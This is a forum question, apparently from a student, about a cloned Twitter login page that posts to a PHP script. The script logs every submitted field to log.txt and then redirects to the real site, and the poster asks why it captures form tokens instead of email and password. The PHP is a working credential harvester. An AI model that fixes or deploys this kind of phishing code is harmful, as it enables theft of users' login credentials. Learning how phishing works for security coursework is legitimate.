I'm doing a phishing assignment for computer security and I'm trying to understand how phishing works for educational purposes.
The index.html of mine is twitter.com and I edited it so that it uses a file.php instead of logging in. The file.php writes down what the user (me, in this case) typed as email and password and saves it as a log.txt, then redirects the user to the real twitter.com. However there's a problem, it doesn't save the email and password, instead it saves what's next after the login in the html page:
session=
return_to_ssl=true
scribe_log=
redirect_after_login=/
authenticity_token=efda136fc6b4513493a115270e13f102e8bef7ef
ui_metrics={"rf":{"bunch-of-numbers+letters...
This is the file.php:
<?php
header ('Location: http://www.twitter.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>
What's the problem? Thanks in advance.
